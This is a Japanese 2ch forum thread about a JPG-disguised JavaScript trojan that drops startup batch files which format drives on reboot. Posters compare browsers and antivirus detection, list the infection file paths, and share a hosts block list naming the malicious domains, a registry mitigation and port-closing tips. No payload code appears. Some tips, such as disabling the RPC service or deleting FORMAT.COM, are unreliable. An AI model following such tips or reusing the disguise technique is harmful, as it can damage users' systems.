踏むとフォーマットされるヤバイ画像対策専用スレ
/⌒ヽ / '''''' '''''' ヽ
| / | (●), 、(●) |
| | | ,,ノ(、_, )ヽ、,, |
| | | `-=ニ=- ' |
| | ! `ニニ´ .! 天狗じゃ、これも天狗の仕業じゃ!
| / \ _______ /
| | ////W\ヽヽヽヽ\
| | ////WWWヽヽヽヽヽヽヽ
| | ////WWWWヽヽヽヽヽヽヽ
E⊂////WWWWWヽヽヽヽヽヽヽ
E//// ヽヽヽヽヽヽヽ
| | //WWWWWWWヽヽヽヽヽヽヽ
ハードディスク全滅OTL
おれのパソコンは今、Sをフォーマット中・・・
みなさんさようなら・・・
逝っちゃたの?
概要まとめ
2007/12/30(日)、gigigi(アップローダー)にてエロ画像がUPされる。
画像にはアドレス(実行ファイルのスクリプトへの)が貼られており、これをクリックするとブラクラが発動、最終的にデスクトップにbatファイルをDLさせる。
再起動した瞬間に発動し、強制的にHDDをフォーマットする。
Internet Explorer系のレンダリングエンジンを使っているブラウザ(2chブラウザ)だと発動する。これはIEが画像ファイルをテキストやhtmlとして展開しようとするからである。
ギコナビ → ポップアップ → 死亡
Jane doe系 → 生存
Jane IE系 → 死亡
スRニル&unDonut等のIE系 → 死亡
火狐&オペラ等の非IE系、またはエンジン切り替え(Gecko等) → 生存
AntiVir ○
BitDefender
ノートン
ウィルスバスター
マカフィー
カスペルスキー ○ 検出名:Trojan-Downloader.JS.Agent.aqr
ウイルスキラー
Windows Live
Live one care
ウイルスセキュリティーZERO
avast!
AVG ○
キングソフト
NOD ○
F-Secure ○ 検出名:BAT/FORMATC.H
IE系でいうとMaxthonも死亡だな。
・MS04-028を利用?
・MS04-028のような穴を新たに発見した0デイ?
・IE系ブラウザの実装の問題?
こういうの犯罪にならないの?
とりあえず通報してみる
0Dayとかそんな大層なもんじゃなくて、ブラクラ詰め合わせ。
BATファイルをスタートアップへダウンロードさせて、なんか色々ダイアログ出て、再起動したらスタートアップと書き換わったAutoexecが実行されて
HDDが順番にフォーマットされるという単純なもの
JPGファイルがJavaScriptになってる古典的なやつだよ。
いわゆるformat c:\のやつかな?
そそ、詳しくはν即にすれ立ってるからそこで様子見してくればいいよ。ただし、問題のJpgが結構貼ってある
から注意な。
Operaも当然問題なかったし、やっぱりTridentエンジンが危険っぽいな
ttp://www13.atwiki.jp/burakura_hdd/
ツール→インターネットオプション
セイキュリティ→
インターネットゾーン・レベルのカスタマイズ
→拡張子ではなく、内容によってファイルを開く
●無効
この設定はないよな
ESET Smart Security その4
http://pc11.2ch.sc/test/read.cgi/sec/1197385178/676
> それ間違い。検出名がずっと気になってたんで今体験版で試したけど、NODじゃトロイ本体は検出できない感じ。
> (Virtual PCに体験版放り込んで、テストしてみた。)
>
> ブラクラ発動後にダウンロードされるウイルスの方を検出しているだけで、トロイ本体の方は、まだ対応してない?
>
> 何でかっていうと、N速に貼ってある今回のトロイのファイル、NODが入っていても(パターンファイル最新12/30版)、
> 普通にダウンロードできてしまうので...(カスペだとダウンロード時に検出されて引っかかる)
>
> なんで、NOD系の人はまだ注意した方が良いと思う。
気がするも何も、そのスレにあるこの画像が未対応なことを証明してるんじゃ…
http://up2.viploader.net/upphp/src/vlphp114643.jpg
他の対応済みAVとは異なり、ESET系列がブロックしたと言ってるのは
問題のjpgではなく画像のスクリプト実行後にDLされるファイル
このファイルのDLに進むということから、問題のjpgはスルーなのが分かる
だから、亜種が出たり落ちてくる物によっては危ないかもな
ん〜、やっぱりそうだよね。 Wikiで○ついてたけど、検出名が変だったので確かめてみたんだけどね。
俺の所で実際に検出させた結果では、確実に止められるのは今の所AVG,AntiVir,カスペの3つ。
この3つは、きっちり止められる。(元の1230.jpg自体をトロイとして検出して、隔離する。)
NODは止めきれない。F-Secureは不明。(今の所、俺の方ではテストできない)
今、Norton NAV2008の仮想環境作成中。テスト終わったら報告するわ。
感染する→未対応
だろ
今回のはトロイであってウイルスじゃないから、感染するかどうかってのは問題の本質とは違う。
トロイの実行を止められなければ、未対応と考えて良い。トロイが実行された結果ダウンロードされる
ウイルスに感染しないかどうかは、別の問題。 その辺を理解してない人が結構多い。
だから、オンラインスキャンで検査なんて、的外れな話が出てくる。
トロイは、基本、常駐型のウイルス対策ソフトじゃないと防げん。 トロイの中身によっては、実行された時点で
PCからファイルや情報抜かれる場合もあるんだし。 そんなん、後からオンラインスキャンかけたって手遅れ。
参考までに分けて試した結果を貼っておきます
共に http://www.virustotal.com による解析の結果です
AntiVir:TR/Dldr.Agent.aqr.20
AVG:Small.2.BJ
F-Secure:Trojan-Downloader.JS.Agent.aqr
Ikarus:Trojan-Downloader.JS.Agent.aqr
Kaspersky:Trojan-Downloader.JS.Agent.aqr
Sophos:Troj/Iframe-N
Webwasher-Gateway :Trojan.Dldr.Agent.aqr.20
AntiVir:HEUR/Trojan.DIRKiller
Authentium:BAT/FormatC.H
ClamAV:Trojan.Bat.DeltreeY-2
Fortinet:BAT/Deltree.gen!tr
F-Prot:BAT/FormatC.H
F-Secure:BAT/FormatC.H
NOD32v2:BAT/DeltreeY.AN
Rising:Trojan.BAT.FormatAll.c
TheHacker:Bat/Generic
必要な時以外JAVAを入れないようにしてるから助かったのでしょうか。
>今、Norton NAV2008の仮想環境作成中。テスト終わったら報告するわ。
テスト終わった。残念ながら、NAV2008 + データベース 2007/12/31 では、1230.jpgをトロイとして認識しません。
今の所、トロイのリンク先のサーバーが落ちているのでウイルスのダウンロードは無いですが、
Norton系ユーザーの方は、引き続きご注意を。
すげー笑えると思うから
>38の後、NAV2008をアンインストール → F-Secure評価版をインストールで確かめました。
F-Secureは、1230.jpgを Trojan-Downloader.JS.Agent.aqr として検知・隔離します。
ですので、F-Secureもきっちり止める組ですね。
防御成功時のパターンファイルは、2007-12-31_08 でした。
(多分、もっと前のパターンファイルから防御に成功していたと思われます。)
Wiki直して、寝ます。(w
おつかれさまです
質問
ノートン先生はスクリプトを実行する前には反応しなかったのでしょうか?
お疲れのところスミマセン
しませんでした。 と言っても、スクリプト自体が、ウイルス等のダウンロードサイトが落ちていて今はまともに動かないのですが。
なので、現状ではNortonは実際にウイルスファイルをダウンロードした時点での防御になると思われます。
とりあえず、スクリプトがダウンロードに行くサイトが復活するまでは、Nortonでも危険性は低いと思います。
まあ、早く対応はして欲しいところですけど。
ありがとうございます
だから途中でうpを断念した。確かIEが強制終了
ちなみに以前はうpを成功させてる
なんか関係あんのかな
再起動についてだけど電源を切らずにスタンバイがデフォになってるのでまだそれ以降電源の入切はしてない
ブラクラを仕込む〜.comにアクセスしないようにする
その1 PFWでcunt.multiservers.comをブロックする。
その2 \windows\system32\drivers\etc\hostsに
127.0.0.1 snipr.com
127.0.0.1 cunt.multiservers.com
書く。
IEの設定変更
C:\WINDOWS\system32\drivers\etc
にあるhostsファイルを書き換え。
ってのは信じrていいんだよな?
ホストってそこに通じるように設定するんじゃいのか?と思って疑ってしまう。
それと、ブラクラを仕込むとIEの設定変更のホストって違うの?
URLがhttp://snipr.comのときhttp://127.0.0.1にアクセスしるって設定だよ。
127.0.0.1は自分のPC。
>>47
パーソナルファイアウォール
さんくす。設定してくる。
PFWもよく分かってないんだけど、avastのWebシールドのURLブロックに
cunt.multiservers.comを入れとけばいいのかな
http://eazyfox.homelinux.org/Firewall/Firewall3.htm
最終的に誘導される方はGeckoでも食らう気がする
4000人の社員がいるんだけどね。
1/4から営業開始です。
ノートンは糞、シマンテックはさっさと潰れろ。
例えばwindows defenderでスタートアップの変更を監視とか。
System Safety Monitorで許可されてないプログラムは実行させないとか。
国内じゃ使用ユーザー数はこの3強だよな・・・
いい加減にしろ
亜種?
これなんだろ?
IE7だとグーグルにいくし
火狐だと白いページ
>>63
・カスペではトロイの木馬 Trojan-Downloader.HTML.Agent.ir
・AVGでは、Trojan horse Small.2.BJ
として検出されます。(他のではテストしてません) 中身は、ulip00206.jpgの後半=1230.jpgなので、亜種と考えて良いのでは。
>>64
あんまり無防備に踏まない方が良いですよ。
-----
NAVのウイルス定義ファイルの更新があったので、>38の環境をコピーし直して(※ Virtual PCですので)
再度テストしてみましたが、1/1 10:00 時点でまだ駄目です。
その後、今度はNAV2008をアンインストール → avast!4をインストールで確かめました。
こっちも、1230.jpgはスルーしますので現時点で未対応です。(データベース 071231-0)
Norton,Avast!使用者は引き続きご注意下さい。
おつかれサマ
ところでスクリプトの暗号化を解読する方法ってどうやるの
が…使い辛ぇえええええ…キーワード検索できないし変なふうに表示されるサイトあるし
プラグインとか探さないとだめなのかねこれは。そのままお手軽に使いたいのにまんどくせ…
2xxでGecko使うならFirefoxがマシだったよ
Operaはダメだ・・・ニコ動で停止・再生でいやに重くなる。ニコ厨の俺には向かない。
Firefoxは、なんかそのままでも使えそうな気がしたけど生のままだと機能すげー少ないのね。
UIを改造しなきゃだめみたいなことがまとめに書いてあったが、スクリプトいじるとか大変そうだったから
プニルの最新版に逃げてみた。しかしこれまた使いづらい…
もうどうにもならねー。マジで困るトロイ作ってくれたもんだよ
なんというか・・・全部慣れの問題じゃね?
ブラウザ乗り換えはいつも面倒なもんだよ
Opera最強伝説というわけだよ
慣れるとマウスカーソル全く動かさずにWeb閲覧やタブ飛びできるようになる
喜ぶべきか、悲しむべきかw
仕様?
誤爆
ウイルスパターンファイルは今日も更新されたけど。
いまいち自分の環境が大丈夫なのかワカラン。
ところでsymantecとtrendは現時点未対応でfixなんだよね?
>>15
が答えでしょうか?単なる以前からある拡張子偽装って事?
こういう板に居ても、IEコンポーネントのタブブラウザは沢山居るし
プニルやDonut系は平気だっていうのに。
IE使ってるヤツはそんだけ多いんだよ
俺・・・バイト後、2chでガキの使い実況
友・・・彼女と合体
親・・・高級料亭で食事
姉・・・年越し合コン
弟・・・彼氏とディズニーでお泊り
またお正月に家で一人お留守番する仕事が始まるお・・・
>弟・・・彼氏とディズニーでお泊り
Dドライブだけフォーマットされちまったみたいなんだけど、それ以降のは何故か助かっている。
おそらく間にDVDドライブ挟んであったからなのかな?どっちにしてもDに溜め込んでたデータが
きれいに無くなってる模様。(パーティションだけ生成されてる?みたいでフォーマットして下さいと出る)
だれか助けてヽ(;´Д`)ノ
これが確か25日以降の出来事・・・昨日まで気づかなかったのはご愛嬌で^^;
finaldataとか復元製品試すしかないのでは?
上書き系消去じゃなくてformat系ってことだし
今フリーの奴でD:スキャン中・・・これ丸1日掛かりそうだな;;
で気になるんだけど、月額版バスターでIE7で踏んでるんだよね。
ひょっとしたら、IE設定とかデフォのままがいけなかった?
正体不明の画像とか踏む奴がいること自体信じられない
おそらく日本人の8割はそんなのだぞ
このコピペは何度見ても・・・
1回で飽きる。
イヤまじで
アナウンスがされてなさすぎだろ
「インターネットセキュリティ?ああ、うぃにー?で情報流出とかあったよね?
でも私使ってないから多分だいじょうぶだしぃ
え、インターネットオプション?何それ?ウイルス対策ソフト?
あーなんかパソコンの電源つけた後画面の右下に変な警告出るねー、それがどうかしたの?」
こんぐらいの認識だろ、ガチで
簡単な対策
System32のFORMAT.COMを消す
どうせ使わんよ
間違いが放置されたままでしたので、対応順にまとめてみました。
時間のある方が居れば、wikiの空欄を埋めて頂きたいです
Webwasher-Gateway JavaScript.CodeUnfolding.gen!High (suspicious)
12月29日
Sophos Troj/Iframe-N
12月30日
AVG Small.2.BJ
12月31日
AntiVir TR/Dldr.Agent.aqr.20
F-Secure Trojan-Downloader.JS.Agent.aqr
G DATA Trojan-Downloader.JS.Agent.aqr
Ikarus Trojan-Downloader.JS.Agent.aqr
Kaspersky Trojan-Downloader.JS.Agent.aqr
Webwasher-Gateway :Trojan.Dldr.Agent.aqr.20 ←定義ファイルでも対応
01月01日
現在のところなし?
これに対応してるのかは知らないな。
それってドライブのフォーマットできなくなるわけだよね?
後からそのファイル復帰することってできんの?
できるんだったら別のドライブにそのファイル退避しといて使うときだけ戻せば最強じゃね?
あんな派手に警告やらポップアップしなかったし、ただ再起動した時におかしいなと思ったくらいでさ。
それ言い出したら、結局のところ、
TrueImageなどを使ったフルバックアップが最強じゃね?
こういうのは触れないのが基本だぜ。
万一、触れちゃったときは不安を抱えたまま使い続けるよりも、
OS再インストールorバックアップから復元、こそが最強。
備えあれば憂いなし、だ!
いや、フルバックアップは普段からするものだろ。
でも復旧には時間かかるからしたくないだろ。
フォーマットできなくしとけばトロイ削除して問題なくなった後ファイル戻せば済む話だろ。
そのほうが楽だろ。つーかなんで触れちゃだめなんだ?
全く役立たずだった事が判明
フリーにも劣るとは・・・
ざまぁwwwwwww
金出してても役に立たないのは立たないねw
サイトを見る前に、URLから運営者情報を確認できる「aguse」
Webシステム構築を手掛けるブイモールは1日、メールなどに記載されたリンク先のURLを入力することで、
サイト情報を調べられるサービス「aguse(ベータ版)」を公開した。利用は無料。
aguseでは、調べたいサイトのURLを入力するだけで、当該サイトのIPアドレスや逆引きホスト名、
スクリーンショット画像などを確認できる。これにより、初めてアクセスするサイトの内容を事前にチェックできる。
また、Googleマップを利用したサーバーの位置情報や詳しいドメイン・管理者情報のほか、企業や団体が
提供するフィッシングサイトブラックリストとも照合できる。なお、サイトによっては情報の取得に時間を要する場合もある。
ブイモールは、「とりあえず手元にある技術を使って、便利なサイトを作ってみた。今のところ収益は考えていない」と
コメント。今後は、届いたメールの送信経路が調べられる機能を2007年1月に追加。さらに、aguseに蓄積した情報を元に
照合できるデータベース機能などを予定する。
(2007/12/17) http://www.aguse.net → http://www.aguse.jp として正式に運用を再開しました。
お手数ですがブックマークの変更をお願いいたします。
サイトを見る前に、URLから運営者情報を確認できるサイト
http://news20.2ch.sc/test/read.cgi/news/1164969914/
AVGで検索して何も引っかからないんだけど
再起動して大丈夫かね?
怪しいbatファイルがあれば手動削除で
つーか、それで元に戻るなら・・・。
570 名前:名無しさん@八周年[] 投稿日:2007/12/31(月) 07:34:28 ID:UpN/oKQ90
>>562
感染確認
心配な人、↓にbatファイルが無ければおk
スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\スタート メニュー\プログラム\スタートアップ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat
AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt
クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat
>>133
サンクス
隠しファイル表示ONにして見てみたけど何も無かった。
Doe系だったからセーフなのかな。
>>1
バスターの性能を試したくてあえて踏んだ
例によってブラクラ発動
バスターは無警告、無反応で使えない事が判明
再起動したけど何もなし
翌日起動したら、マイコンピュータのDVDアイコンが消えて
DVDが利用できなくなった
他にも異常が多数発生
レジストリが書き換えられていた模様
システム復元で元通り復旧
705 名前:名無し募集中。。。 [] 投稿日:2008/01/01(火) 23:38:44.79 0
マイコンピュータから
DVDドライブのアイコンが両方とも消えている・・・
おかしいと思って
デバイスマネージャで見たら
DVDの所に「!」マークが・・・
で更にプロセッサの所に「!」
どうしたら、いいんでしょうか?
748 名前:名無し募集中。。。 [] 投稿日:2008/01/02(水) 00:05:36.64 O New!!
うちのパソもDVDやられてて
なんか踏んでたのかノートン反応無かったお
724 名前:名無し募集中。。。 [] 投稿日:2008/01/01(火) 23:50:49.65 0 New!!
実際にHDDまでいかれた奴いるのかな?
今のところは>>35>>705みたいにDVD使えなくなる程度の被害だけっぽい
正直目から鱗
それ何処のスレ?
俺はD:のHDDが見事にデータ飛んでるからな・・・なんか色々なパターンがあるな、どゆこと!?
その人たちはDドライブにDVDドライブがあったんだろ
もしDドライブにFDDがあったらそれが消されてるだろうし
HDDがあったらそれが消されてるだろう
これって Dドライブから順番にEFGH・・・ってつぶしていくんだよね?
【モ娘(狼)】踏むとHDDがフォーマットされるヤバイ画像問題について
http://mamono.2ch.sc/test/read.cgi/morningcoffee/1199186657/l50#tag330
俺はFとGのDVDドライブが消された
症状によってはDVDドライブが逝くって書いてあったから確認してみた
・・・
動かない・・・
ウィルスにやられたかと思って色々確認してみたら
数日前に導入したwin_acceleratorの起動短縮がネックになってったっぽい
OFFにして再起動したら全く問題なかった
ふぅ、あせったぜw
この糞企業に非難決議出ないのがおかしいな
>133しらべても問題なかったけど・・・
俺IE7だけど>>103が踏んでるってのが心配になって
一応セキュリティ設定とhostsは対応済みで
>>120をやっておく事にした。念の為確認だけどこれで最強?
どんだけ心配性なんだよと思われるかも知れないけど
>>1
バスターの性能を試したくてあえて踏んだ
例によってブラクラ発動
バスターは無警告、無反応で使えない事が判明
再起動したけど何もなし
翌日起動したら、マイコンピュータのDVDアイコンが消えて
DVDが利用できなくなった
他にも異常が多数発生
レジストリが書き換えられていた模様
システム復元で元通り復旧
705 名前:名無し募集中。。。 [] 投稿日:2008/01/01(火) 23:38:44.79 0
マイコンピュータから
DVDドライブのアイコンが両方とも消えている・・・
おかしいと思って
デバイスマネージャで見たら
DVDの所に「!」マークが・・・
で更にプロセッサの所に「!」
どうしたら、いいんでしょうか?
748 名前:名無し募集中。。。 [] 投稿日:2008/01/02(水) 00:05:36.64 O New!!
うちのパソもDVDやられてて
なんか踏んでたのかノートン反応無かったお
今の所、マイコンピュータのDVDアイコンが消し飛んでDVD利用出来なくなった報告が結構多い(大半はシステム復元で復旧)
ただ、HDDが飛んだっていう報告や他のデバイスが使えなくなった報告もあるので色々なパターンがある模様
http://mamono.2ch.sc/test/read.cgi/morningcoffee/1199186657/
http://pc11.2ch.sc/test/read.cgi/sec/1199083492/
ttp://gunkanmaki.jog.buttobi.net/MiniReport20040313.html
もうね、これ一体何年前の話って感じ。おまいらまだ学習してないの?
少なくとも4年近くも前からずっと2ちゃんで話題になって、
鑑定スレのテンプレにもとっくに載ってるだろ。
IEの人は、以下を参考に。
http://kissho.xii.jp/1/src/1jyou21930.jpg
インターネットオプション(IE)の「拡張子ではなく、内容によってファイルを開く」の
項目を『無効』に設定。これで画像を擬装したhtmlファイルは無効化されます。
jpg偽装には対応できています。
http://www5.uploader.jp/dl/tane/tane_uljp00206.jpg.html
Sleipnir系等ブラウザ側がこの設定に対応してない場合はさらに、
レジストリの設定が必要です。
以下をテキストエディタ(ノートパッド等)に保存して、
拡張子を.regに変えることでレジストリファイルが作れます。
これを右クリックから結合でレジストリに書き込まれます。
======↓ここから↓======
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING]
"Sleipnir.exe"=dword:00000001
======↑ここまで↑======
Sleipnir以外のIEコンポーネントブラウザを使っている場合は"Sleipnir.exe"の部分を、
使用しているブラウザのexeファイルに変えてください。
金払ってるの馬鹿らしくなったりしないのかね
旧御三家なんて一日に一回しか更新しない糞セキュリティソフトばかり。
脳豚や馬鹿フィーなんて更新料取る分ウイルスセキュリティ以下のゴミソフト
IEのほうはもちろん感染する
やっと対応したか
残念ながらAvastは7.5.0.516(2008.01.01)では未対応のままです。
意外なことに動きがあったのはMSで他は以前の報告と変化なしでした。
Microsoft 1.3109 2008.01.02 TrojanDownloader:JS/Agent.JG
ご苦労様です。
NOD32なんですが、今の所トロイ本体には対応してないので、WikiのNOD32の対応 ○から無しに書き換えようか、思案中。
(当方の体験版入れたVirtual PCでは、思いっきりスルーしてトロイが動作する。)
今の状態だと、誤解を招くんだと思うんだよね...今日中に対応がなかったら、NOD32の○は消す予定。
御三家の対応は、今の感じだと4日以降かな。 タイミングもあるけど、今回はずいぶん遅く感じるね。(w
で>>153を開いて「ダウンロード」をクリックしてみた。
ttp://www5.uploader.jp/dl/tane/tane_uljp00208.jpg.html
こうなって、
ttp://www5.uploader.jp/dl/tane/tane_uljp00209.jpg.html
こうなりました。
ご参考になりましたら幸いです。
失礼しました。
御三家はいずれも外国なので正月は無関係でしょ。
てか、御三家はこれまでの対応状況からすると、最低一週間はかかるでしょ。
遅いときは一ヶ月くらいかかることも珍しくないし。
簡単に入手出来た
どうぞ好きなだけなじって下さい
常時正月は酔っているんでw
AVG=アダルトビデオギャル
AGV=アバンギャルドビデオ
フリーのアンチソフトもいいかなとは思うんだが、また別にファイアウォールとか
入れなきゃならんのが重かったりしてうざそうな気もするんだよなあ
話聞いてると、今回のはまともに被害くらったら個人ダメージはでかいが、
データ流出系の二次被害危険は低め、気づき易い、普段からある程度気をつけてれば
あまり引っかからない、被害は日本中心ってことで危険度は低く考えられてるんだろか
http://mamono.2ch.sc/test/read.cgi/newsplus/1199237647/225
ざっとファイルの中を見たけど、別に危険じゃない。何故かカスペオヤジ怒るけど。(w
ちなみに、タイトルにある写真じゃないよ。リンク先はHTMLのjrpg偽装ファイル。中身は下記の<HTML>から下) ※ 本来の中身から、urlのhttp://は全部抜いた。
リンク先のdate65125.jpgもjpeg偽装で、こっちは ttp://sakuratan.ddo.jp/uploader/source/date65124.gifの表示と、Sleipnir用の注意書き。
『 今話題のHDDをフォーマットするURLの対策不完全版です。Sleipnir用。 』とかいう説明で、何回か見た記憶あるが、何時の間にやら第4版になってるな。(w
<HTML>
<HEAD>
<META http-equiv="refresh" content="5;url= //sakuratan.ddo.jp/uploader/source/date65125.jpg">
<TITLE>test META refresh</TITLE>
</HEAD>
<BODY>
<pre>5秒後に自動で移動します。
5秒待っても自動で移動しなかった人は手動でリンククリックしてください。
リンクになって無い人は勝ち組です。URLコピペで進んでください。
<!-- これをコピペ→ sakuratan.ddo.jp/uploader/source/date65125.jpg -->
非IEブラウザで勝ち組だった人も出来ればIE等で確認しておいた方が良いです。
<a href=" sakuratan.ddo.jp/uploader/source/date65125.jpg" target="_blank"> sakuratan.ddo.jp/uploader/source/date65125.jpg</a></pre>
</BODY>
</HTML>
あらま。得意げにありがとよ
>ざっとファイルの中を見たけど、別に危険じゃない。何故かカスペオヤジ怒るけど。(w
ごめん、専ブラがちょうど他のファイルを開いたのとタイミングが重なっただけらしい。
もう一回チェックしたら、別に>170のファイルではカスペは何も言わなかった。
気に障ったかね?(w
2chで細かいこと気にしてたらストレスたまるぜ? 自分で踏めないのを他の人が代行したんだから、それでOKじゃん。
どうもありがとうございました。
>>172
うんこをたべなさい。
Jane doeでよかった
「拡張子によって、適切なプログラムで適切な手順でファイルを開く。それ以外に動作させない。」
なら宜し。IE6の脆弱性と捕らえて宜し。
ウイルスバスター(笑点)
このスレ住人じゃ知らないか?(w
「平気でぶち抜いて来る奴」が意味はおろかイメージさえ湧かん
2chでわけのワカラン言葉に出会ったの実には5年ぶりぐらいだw
ってかAntiVirを使いこなせるだけのスキルがあるなら同時常駐やめろよw
信頼性の高いウイルスソフトウェアでも対応できてないウイルスって意味じゃないの?
ウチのは、
JaneDoe View α ( build date: 061208 )
なんですが、大丈夫と言うことでしょうか?
そんなやつは、うんこをたべなさい。大丈夫だから。
bot1.4とAVG7.5で問題なく使えてる。bot1.5は知らん。
kasperskyが下の名前で検出する方は本日未明Esetに検体送った。
http://www.virustotal.com/analisis/f205c97204f0185d9d4c73e8957f01dc
最初の1230の方は、誰かが送ると思ってもてあそんで捨てた。
VirusTotalで何度も再検査したのでVirusTotalからベンダーの方に行ってないかな。
すまん見間違えた。バスターね。バスターは無理ではないが止めた方がいい。
理由はググレばわかる。
自己で対策してないPCでも大丈夫なん?
>既に沈静化しました。新たに感染することはありません。
HDDをフォーマットするブラクラ まとめwiki - トップページ
http://www13.atwiki.jp/burakura_hdd/
>報告にも偽のものがあるようなので注意。
サンクスです!
ググってみます
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
AntiVirの操作性はすんごく理にかなっていて優れると思う。
UIが洗練されてるというか、英語であることを差し引いても
使いやすい。ちなみに個人的にもっとも使いにくいと思うのが
nod32。amonとかimonとか変に分離しちゃって抵抗感がある。
NISも使いにくい部類。
逆にセキュ板で叩かれてるバスターはなんだかんだいっても使い勝手はいい。
ま、有料ソフトはカスペ系以外全滅なのは残念だ。
馬鹿フィーはそれ以前に糞すぎるので失せろという感じだけど。
2008年1月2日 20:00頃 VirusTotal再解析結果
http://www.virustotal.com/jp/analisis/d9c375d91347f2c66b00348869fa73f3
【対応済(8本)】
アンチウイルス 更新日 結果
AntiVir 2008.01.02 TR/Dldr.Agent.aqr.20
AVG 2008.01.01 Small.2.BJ
F-Secure 2008.01.02 Trojan-Downloader.JS.Agent.aqr
Ikarus 2008.01.02 Trojan-Downloader.JS.Agent.aqr
Kaspersky 2008.01.02 Trojan-Downloader.JS.Agent.aqr
Microsoft 2008.01.02 TrojanDownloader:JS/Agent.JG
Sophos 2008.01.02 Troj/Iframe-N
Webwasher-Gateway 2008.01.02 Trojan.Dldr.Agent.aqr.20
【メジャー所で未対応】
Avast 2008.01.01
BitDefender 2008.01.02
McAfee 2007.12.31
NOD32v2 2008.01.02
Symantec 2008.01.02
VirusBuster 2008.01.01
Microsoft、対応したなぁ...御三家、面目丸つぶれだのう。
有料ソフトだと、F-Secureも早かったよ。まあ、カスペエンジンだからかもしれんけど。
( ,_ノ` ) n
 ̄ \ ( E) アボジにおまかせ!!
フ AVG /ヽ ヽ_//
本当にリンク先に行っていいかを確認する「よろしければクリックしてください」という画面に
いったんですがなんか怖くなってそこで閉じました 大丈夫でしょうか?
http://namidame.2ch.sc/test/read.cgi/news/1199269366/l50
あれ、そうなの? ちょっとVirtual PCで試してみるんで、報告待ってて。
筆ぐるめが使えず。
いろいろやってたらファイルが消えたんですが・・・・
これってやばくない?
ご期待に添えず残念ですが、OneCareで検出隔離できました。検出名称:TrojanDownloader:JS/Agent.JG
なんで、MicrosoftのOneCareも対応済みで間違いないです。(Virtual PC + 体験版ですが)
御三家、早く対応しろよ〜...M$に負けてんじゃねぇか。(w
いや別にいいけどVirustotalにしてもAV-Test.orgにしてもただ単に「MicroSoft」しか載せてないからややこしい。
しかも個人向け(OneCare)と企業向けは検出率は違うとも公表してるから第三者機関でもはっきりさせて欲しい。
あと御三家なんてウイルスセキュリティの足元にも及ばないカスソフトでしょ。
まあ確かに。
こうなってくると、御三家で最初に対応する所と、一番最後になるのがどこかって所にポイントが変わる。
正直、興味津々...御三家のどこが対応最初だろうね。
さて、別のことしてて遅れたが、
>本当にリンク先に行っていいかを確認する「よろしければクリックしてください」という画面に
>いったんですがなんか怖くなってそこで閉じました 大丈夫でしょうか?
ついでにVirtual PCで確かめてみたが、クリックして最初に行くのはimu.nuという転送サイトだから、
そこで閉じていれば実際にはリンク先に飛んでないから大丈夫。
リンク先に飛んでいくと、今回のトロイ騒動で最初に出てくるエロ画像が表示される。
これ、元のトロイの話知ってないと、どっきりも何もしないわな。
まじありがとうございます!
安心しました!!
すいません218でした
感謝です
ノートン関連を綺麗に全部消さないとマズい?
今頃になってスタートアップ見て感染されたのが確認できたのですが・・・
感染したということはもう手遅れなんでしょうか?
2,3日の間は問題なくPC作動してたのですか?
IEが重く感じることがありましたが・・・
勝手にフォーマットされたりだとかということは何もありませんでした。
2ちゃんねる内のものですか?
2ちゃんねるにぎぎぎのアドレスがあったのでつい踏んでしまいました
そのものズバリを踏んだのですか
踏んだら言われてるよな画像が出たりしましたか?
例の画像が出ました。
そのあとも何度も出てくるエラーを慌ててエンターキーで沈めた後そのブラウザを閉じました
その間、ノートン先生が何度も反応してましたが、内容は覚えてません・・・。
それからPCは終了せずにサイト徘徊やらしてました。
今頃になって危険なウィルスだったということを知った状況です・・・。
例のbatファイルがあれば食らってるからautoexec辺りもチェック、って所か。
大変でしたね…スタートアップにはなんというファイルがありましたか?
WinUpd91.txt .bat でしょうか?
まさにそれがありますね・・・これ削除したほうが良いんでしょうか?
そのまま再起動したらトロイが動いてあぼんするな。
いや私も初心者でそこのとこがよくわからなくて
お役に立てずすいません…
こ、こわ・・・奇跡的に生きているということか・・・
とりあえずこれ削除したあと、どうすれば良いか分かりますか・・・?
KIS7の体験版を落としてチェック。
駄目もとでファイルを削除。
次にDAEMONで仮想CDをDとZに設定してトラップを張る。
ことですか?初心者ですいません
ニュース速報板ではスタートアップにあるファイルを削除だけで
問題なく再起動できたという報告があがっていた。
が、対応してるアンチウイルスソフト使って駆除を試みた方がいい気がする。
niftyのオンラインスキャン・・・でも感染した人は途中エラーで中断させられたらしい。
>>242
